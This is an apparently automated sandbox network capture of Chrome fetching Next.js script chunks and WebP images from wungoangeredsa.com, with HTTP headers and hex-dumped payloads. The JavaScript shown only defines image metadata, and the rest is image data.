                                                                                                          94192.168.2.450143104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/20a35a44b4f8b20a-1736072686539.c29d864a1f4963e0.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-183"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4176b9034321-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC394INData Raw: 31 38 33 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 39 38 30 37 5d 2c 7b 33 39 38 30 37 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 34 2e 34 35 39 65 37 64 39 36 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 77 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 46 41 41 41 41 44 51 41 51 43
                                                                                                          Data Ascii: 183"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[39807],{39807:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_4.459e7d96.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlwAAABXRUJQVlA4IFAAAADQAQC
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          95192.168.2.450144104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/f23d1daac59993b6-1736072686539.c517d511b765818c.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:24 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17b"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4176bb1c4269-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:24 UTC386INData Raw: 31 37 62 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 34 30 36 36 5d 2c 7b 34 34 30 36 36 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 31 2e 65 64 32 38 33 65 66 35 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 59 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 6f 41 41 41 44 77 41 51 43
                                                                                                          Data Ascii: 17b"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[44066],{44066:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_1.ed283ef5.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlYAAABXRUJQVlA4IEoAAADwAQC
                                                                                                          2025-01-06 11:09:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          96192.168.2.450145104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC638OUTGET /_next/static/chunks/9d01a94e442e71b2-1736072686539.1f0bd67ad15ff842.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:24 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1057
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:24 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4176e9b980e0-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC387INData Raw: 31 37 63 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 38 33 37 36 5d 2c 7b 35 38 33 37 36 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 32 33 2e 31 65 61 37 64 36 30 39 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 67 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 77 41 41 41 43 77 41 51
                                                                                                          Data Ascii: 17c"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[58376],{58376:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_23.1ea7d609.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAACwAQ
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          97192.168.2.450146104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC665OUTGET /_next/static/media/f_24.a0b04b39.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC498INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 14024
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-36c8"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 989
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41774a534376-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC871INData Raw: 52 49 46 46 c0 36 00 00 57 45 42 50 56 50 38 20 b4 36 00 00 30 2c 01 9d 01 2a 00 02 00 02 3e 6d 30 92 46 24 25 21 a1 2f 32 9b 68 a0 0d 89 67 6e 72 78 3a 17 aa 7f a7 fb 1b e5 33 db 9e de bb 0b c7 7f 82 7a ab c5 fe 1f f3 40 1f 04 27 4f 32 fc 23 ca 56 dc ae e3 a2 7e bb f9 dd c2 7d 61 fc ef fb f7 f2 4e 64 7c 43 f9 97 f7 df ea df ba 5f e3 fd 0f fd 6f fa 3f 8c 27 87 7f 79 ff 6f ee 07 fc 3b f9 af f7 7f ea 1f bb 5f e6 f9 d3 3f 87 f2 0f 61 2f f7 7f c2 ff ec ff 5c f3 1b fe 9b f9 47 c0 bf a1 ff ec 3f a3 7e 39 7d b9 fe 85 ff c5 fe df e9 1b f8 07 50 37 f1 4f e0 5f f2 bf b4 fb 66 fd 5f ff 07 f6 8f f6 1f bb 9d 28 9f c2 7f f4 7f 7b f6 00 e9 00 e9 2e 82 d7 9f 42 e6 0b f2 6f 22 74 f5 b9 7d b7 4f 39 f9 cf f0 73 f9 df de 3c 91 fc 7f e9 1f de 7f 7a ff 31 ed df fb 36 69 fd 3b
                                                                                                          Data Ascii: RIFF6WEBPVP8 60,*>m0F$%!/2hgnrx:3z@'O2#V~}aNd|C_o?'yo;_?a/\G?~9}P7O_f_({.Bo"t}O9s<z16i;
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 94 f2 d4 03 f9 69 43 4a 9d 18 c4 19 cd 7b fd 48 f4 1e b0 84 9f ac a6 43 2a 5c fa e9 0e d4 55 80 4e e8 b3 77 47 b9 ba 23 be 15 c9 43 3e 27 41 c5 76 e8 19 e1 98 68 00 e7 c0 b6 36 ad 92 6b 51 2c ba 07 64 a0 9c 62 d2 ca 0b ce e0 6a c0 cf 02 62 c1 10 6d 79 81 e5 bc 48 b5 50 c6 8b 55 f5 65 08 fe ea 42 44 f6 41 04 bd c9 3d f1 cc 02 7b 84 30 cb f5 d9 d5 dd 10 83 1a c0 b5 a8 00 d9 67 01 b8 5c 8b 0f f3 33 42 07 73 7a 67 84 b0 11 e6 ef fe 25 b2 00 e2 42 fc 0b 8e fb 90 45 e9 dc 68 c2 61 a0 04 43 a2 c6 1a d1 f1 cd 6a f8 69 5d 91 0a e9 17 27 01 fb 15 9f 0c ad 9f 84 fb c0 82 49 2d af c2 35 c2 30 4d ae 9f a8 ae d6 07 57 b5 32 7a bb 2f b1 03 76 e7 d2 18 b2 b8 f4 a2 75 c8 97 71 97 da b5 8c 7e 20 05 6d 64 f8 b1 32 05 cc ee fa 6c 2c 81 54 08 ee 5d 1b 1d e9 65 02 6b 73 e2 33
                                                                                                          Data Ascii: iCJ{HC*\UNwG#C>'Avh6kQ,dbjbmyHPUeBDA={0g\3Bszg%BEhaCji]'I-50MW2z/vuq~ md2l,T]eks3
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 60 8c 76 7e e0 9a 32 ac 81 f2 df ca 99 36 85 4c 53 40 12 eb 09 4f d2 e9 9d d2 3b ad cc 30 29 3d 3a ca 31 fe 22 85 2c 22 03 39 1e 1d 40 ad 7b 43 4c 06 7d 34 0f ea f3 32 dc f4 63 58 e6 bb eb 0d 7b 07 e7 1d 5a 3d 0b d8 2b ed b4 c0 62 7d 0c d1 30 82 a4 7e ff fc ef 57 3e 56 3d 76 2d 7e 08 0b 24 87 77 21 57 f9 9a fd 5e fe 2d 6f 56 b7 45 91 42 fd d5 72 91 36 9d 15 61 1e 8d 34 cf ee 0d 30 af c6 42 23 9d 80 38 bf dd 72 5b 7c a5 0e 64 de e2 cc 35 5f 17 ad 98 12 52 94 25 67 02 65 bc b5 8d 0f 82 6b 23 07 9e bd 68 42 ba 08 17 d2 c7 65 14 ed c2 f6 62 ae cd f4 de b4 f6 0b 0b 00 00 fe f0 79 de 17 fd fe f3 47 bf 6c d8 38 45 35 2c a5 3b ab ba d5 04 c5 82 30 96 fb 18 44 f3 e6 98 3e 32 29 2d 13 cb 49 1f ff e7 53 27 9d 46 7d af c3 1c 66 8f 6b 9e 05 07 43 ea b1 ea f9 86 9d c3
                                                                                                          Data Ascii: `v~26LS@O;0)=:1","9@{CL}42cX{Z=+b}0~W>V=v-~$w!W^-oVEBr6a40B#8r[|d5_R%gek#hBebyGl8E5,;0D>2)-IS'F}fkC
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: c6 d2 f1 82 63 e4 90 5a d4 b0 f8 85 04 b1 da 3d fc 49 3a fa 23 17 51 b3 e7 db 70 a4 69 85 ec db 3a ee d5 8c e5 6d 9d 16 90 2b cb 00 e7 da 0c 5e 44 e2 08 de 13 52 4e 80 01 9d f8 cc 87 a5 dc 9a b8 09 cb ff c8 6d 7b 34 f7 86 2e 8e 28 08 4c 35 58 e9 8a 2b 3d 06 83 42 ce 92 2b 12 67 b7 f4 dd bd 11 4b c1 1f de 52 c3 a3 67 73 83 51 3a 46 82 f5 d6 a5 09 33 ae 21 55 df 4e 79 5c be aa 34 71 e6 d9 24 d4 79 54 e4 c8 de 73 55 be 4c 4b 8c e4 3d d2 af 43 78 28 32 26 18 97 49 8f f0 38 57 ca 17 4c 83 7f 5f 8c 34 99 de 36 3c f3 33 ca 9b 33 18 d6 0a 82 f2 13 3a cb 61 6b 8f db 19 27 d0 74 9e 74 fa d2 35 d2 9b af 84 7b 17 bf 9c be 0a 76 b7 be 6f e2 2f ba 49 4e d8 dd dc ff 92 47 f7 0e cf 29 81 bf 0a be dc df f2 a7 89 fe 61 8b 97 cc ee 21 f2 e2 c7 0d cb 3f 2a 0a a7 f7 65 a5 de
                                                                                                          Data Ascii: cZ=I:#Qpi:m+^DRNm{4.(L5X+=B+gKRgsQ:F3!UNy\4q$yTsULK=Cx(2&I8WL_46<33:ak'tt5{vo/ING)a!?*e
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 70 5b c7 58 87 e9 bf 82 83 b6 3e 53 90 14 ef 88 fa e6 01 dd 73 97 a7 5f a8 32 fe fd f1 1c de b5 93 3c cc 93 e1 4c d1 9f c4 af cf 11 a0 1f 88 08 b7 c2 36 df 3b 26 91 fd fe 86 8a e2 9c 40 29 b1 20 9e 51 6f da 24 4c 21 68 25 21 84 74 ff d1 86 89 47 04 15 a2 93 1d 74 13 d7 b7 c9 92 b6 69 4a f9 4a 50 40 f4 01 af 21 0e 4d 2a fc df 09 81 7e 8f ee 3e d8 7a fe 61 7c fd 3d bb f8 1a 28 9c 1f 4e 27 88 2a 56 3c 8e c0 a6 2f ff e3 0d 35 58 b7 ee 41 be a3 99 1d 3e 0c f6 2d 33 78 32 27 5a 43 a1 c4 10 87 94 5b 6d df bd 22 a3 32 9f 5f 55 df 34 e4 e4 ea d3 c3 97 8b 99 49 8e 26 27 81 7a c3 94 33 be 51 d2 ce 07 0a fa f9 0b ec 65 1b 3f 75 d7 10 63 d8 7b fc 13 a6 f5 27 97 01 e2 3c 2c 85 fa 3e ef 13 43 5d c8 4a 4c bd b8 5f 1d 4c 55 f6 8b bd 98 97 a4 84 18 b5 0c 01 6b 4c 82 30 08
                                                                                                          Data Ascii: p[X>Ss_2<L6;&@) Qo$L!h%!tGtiJJP@!M*~>za|=(N'*V</5XA>-3x2'ZC[m"2_U4I&'z3Qe?uc{'<,>C]JL_LUkL0
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: f7 72 5e dd 58 4b 70 09 b3 7d 58 78 77 0d 53 31 de 14 49 23 cd e3 5a 2d b0 ed 6e 77 57 ee 4d 25 45 1b ce f8 2a 9b 63 7e 60 7d 9c 03 06 4a 4a ae f7 fe bf fa 4f d9 d2 65 79 b6 40 72 33 e2 2e 34 7a 83 fd 6a ab db 8c fd 47 89 de 85 aa 82 5d 9a 2d 23 9c e0 39 08 08 cd db da ed 78 85 de 6c d3 8e e0 3b c3 cc aa e5 7f c6 2c be a5 f8 87 cb bd 98 f4 75 fe 55 b7 0a ac 2e 16 f2 8f f9 be 62 4c 82 be f7 f4 89 f8 f1 58 8f 49 4d b2 f7 ec dc 8c 83 4e 34 1a 93 7f 77 4a aa 3c db ac 5e d8 3a 8e bb 31 79 4a b8 c7 d3 ee 30 6f 93 17 1e 06 65 cd d0 15 4d f4 98 8e b0 6d 04 8b 21 f2 16 e0 60 f0 c7 f5 9b 3b 48 c6 49 f4 60 49 a0 13 26 47 f1 f4 c2 eb 1b 92 f0 60 1e 29 a5 bd 48 05 44 d4 34 e0 ca b6 7f db de 53 b3 8c 24 2a a9 8b d4 16 48 6c a1 d3 24 f2 3c 6e 0d c7 23 51 55 bb 9a 3b 7f
                                                                                                          Data Ascii: r^XKp}XxwS1I#Z-nwWM%E*c~`}JJOey@r3.4zjG]-#9xl;,uU.bLXIMN4wJ<^:1yJ0oeMm!`;HI`I&G`)HD4S$*Hl$<n#QU;
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 5c 34 04 ba 4c 48 7c 47 fc b4 9a b9 da c5 20 ff 78 5c 60 b2 df d7 24 22 c5 bd b2 70 88 00 be 87 47 ae ee 57 15 76 e6 35 c4 6c 77 9d b5 c5 0d 24 15 58 5d 09 5a 1b 1c 34 46 04 cf 40 02 cc 31 ec da 65 bd 6d e2 14 8f 6f 8f 83 ec ca 4a e6 59 ad 10 41 7d 4c be 60 2e aa af f6 45 b7 0a a1 69 19 d3 a3 4f 95 92 d9 6c 72 31 db 2a 8a 73 5e 7a 00 78 10 5a c3 39 38 e4 cc b8 d0 d8 56 e4 95 e7 83 70 38 8e 43 be 2f 22 bf 88 6a a8 bb b8 d9 68 68 0f 77 3a 0c f9 be a1 05 e8 58 ba 20 6d 30 4d 29 42 4b fd cf 67 ed 53 6c dc 2b 2a b0 99 31 0c 88 1d 9c c0 72 10 a8 0a 11 59 2f e0 c2 20 1e c7 d1 83 db 95 63 6a 7e f8 a3 2f 24 94 22 ba 2f 43 0a a2 f1 9b 71 83 91 87 d5 7f 4b 0d b0 6e 60 e1 1b bc 3f f3 bd ef bb 07 45 26 3a e8 11 18 46 39 f1 e3 1c 6a c1 68 86 f6 88 c9 b7 00 7b 66 bc e4
                                                                                                          Data Ascii: \4LH|G x\`$"pGWv5lw$X]Z4F@1emoJYA}L`.EiOlr1*s^zxZ98Vp8C/"jhhw:X m0M)BKgSl+*1rY/ cj~/$"/CqKn`?E&:F9jh{f
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 94 46 1d 87 01 b4 b0 c4 8c 45 31 f6 ca ab d3 36 fc 02 04 d2 6d 3a 5f ef b2 af 0e 1f c6 15 39 bf 12 21 6e a7 72 0e 36 60 51 bc 16 83 d6 03 4c d1 36 10 32 d0 21 60 9d 10 d3 fc 25 5d f2 f2 b8 18 c4 88 bd 74 90 b8 00 80 5d 0b 26 3a 33 2d 3f a7 17 70 b0 12 f2 a3 13 bb 97 c0 39 b5 92 d9 e4 e4 53 49 f1 dc 4d a8 59 90 f9 b7 d5 64 3f 91 f4 e0 aa 5e 01 85 2f a7 a7 b8 72 9b 26 51 67 18 e9 8f 3b 83 05 4c 5f 35 43 a9 39 e3 c4 6e 72 b3 0d f2 0a c6 e2 ae 9d 0a 1e a0 a7 fc f1 fa 56 90 34 92 0e 9b 48 a9 4e e3 95 ec e5 26 a4 d6 06 3f 6e 09 c8 ff 2a 2a 71 73 dc e4 53 a0 79 ef 7c 4a 62 0e 47 2c 18 0f bc fa 9b 5b 99 c2 cd b6 c3 0c 02 79 6f 32 ef 86 ad e6 fc 62 f6 b7 d1 98 7e 60 b0 9b f2 54 5b 0b 10 4d 8b 89 29 db 59 7c 2a 6b 12 d3 35 6d a6 1b a2 72 15 93 bd b7 a2 74 4f b5 1c
                                                                                                          Data Ascii: FE16m:_9!nr6`QL62!`%]t]&:3-?p9SIMYd?^/r&Qg;L_5C9nrV4HN&?n**qsSy|JbG,[yo2b~`T[M)Y|*k5mrtO
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 30 e9 fc 01 dc b0 38 d8 6b be 16 01 00 6f ae 32 d6 05 03 a1 6d 9b 61 a8 02 80 c5 c3 54 d4 4d 87 7a b1 37 92 0d e0 c4 bf 89 36 dd 8c 1a b0 b8 31 97 93 21 52 c3 f4 96 82 83 82 62 20 56 70 6c 83 ec b4 07 4e c2 99 d3 63 df 52 75 81 9b 31 51 0f 51 7a 5a 02 b7 50 75 cf 3a 1e 56 bc c2 65 af 74 3b 33 24 eb e1 8f bf 93 14 9c 3b 56 a9 aa eb 24 18 12 47 e8 78 03 4a 37 e5 d1 7f 7e a4 cb 73 6a b4 ce 25 0b ee 4e df 00 3d 77 1e b4 a4 4d 6c 8f 72 7d 7f b6 ee 77 44 bb 20 4f e6 bf 0e f6 f5 8a e2 7b 20 c3 b7 5e 2f 0c ff 3a 51 b7 58 38 5d b2 52 58 85 3d 50 d4 ad 6e e5 e7 4d 36 6b b5 8f bb bd b6 30 9f be 61 e0 f7 40 40 b6 70 28 3d 47 ce 62 6b 71 0a 7c 5c 84 54 99 ea 2c a5 fd bc eb 77 91 b7 dd 3d 9d 9c 66 1d 46 09 16 ef 97 1d 2b ac a9 83 5a 1c 91 35 3e b7 b4 4e a0 62 44 68 d4
                                                                                                          Data Ascii: 08ko2maTMz761!Rb VplNcRu1QQzZPu:Vet;3$;V$GxJ7~sj%N=wMlr}wD O{ ^/:QX8]RX=PnM6k0a@@p(=Gbkq|\T,w=fF+Z5>NbDh
                                                                                                          2025-01-06 11:09:25 UTC1369INData Raw: 0e 57 93 c0 99 9f 68 2e 71 3c aa 8c 8a 1e b0 e3 b8 33 ad fd 09 97 95 b8 e5 b2 17 e7 22 da 01 8f fe 31 6a 3e 1a 27 e1 90 85 e0 15 56 0c c1 8c 56 29 7b cf 9a 6f 2b 2b 69 0d ea aa 9c 3e 3f 0f e6 fa c0 87 e5 1d 6a 43 79 e6 2c bd 35 28 c7 f7 2d 42 b6 04 b5 68 6e 59 f2 77 80 6c b0 1d 90 4b d7 73 74 a8 00 67 38 71 d4 4b 4f 38 45 a0 c2 5a 82 b8 ba 4d 1a f0 9c 06 80 7d 17 81 45 4e 16 9c 47 d8 45 d0 d4 f0 3c 67 1e 9b cf ab e9 28 ce 60 a9 c7 3b c7 9e 88 c4 6d d4 7a 7d 2e 56 eb 1a e1 57 10 f6 66 ec 79 a6 fd 01 d1 91 61 8b 4c f8 3a bd ef 0f 27 47 a0 01 09 10 77 3f 75 ac 6a 66 a7 c6 50 6c 6a d4 1c 76 19 15 d9 72 0a 96 c6 ac 95 74 01 ff 84 af 83 e8 46 f2 15 e8 c1 10 48 5a 75 81 72 fe cb b6 8b 67 76 23 84 21 e8 b8 5e e2 1b 2d 0e 8f 20 3c d5 33 73 6d 7e 23 25 6f 6e 62 e6
                                                                                                          Data Ascii: Wh.q<3"1j>'VV){o++i>?jCy,5(-BhnYwlKstg8qKO8EZM}ENGE<g(`;mz}.VWfyaL:'Gw?ujfPljvrtFHZurgv#!^- <3sm~#%onb


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          98192.168.2.450147104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC497OUTGET /_next/static/chunks/1fd69c98394a3b87-1736072686539.8146f5f4d16f0056.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-180"
                                                                                                          Strict-Transport-Security: max-age=1
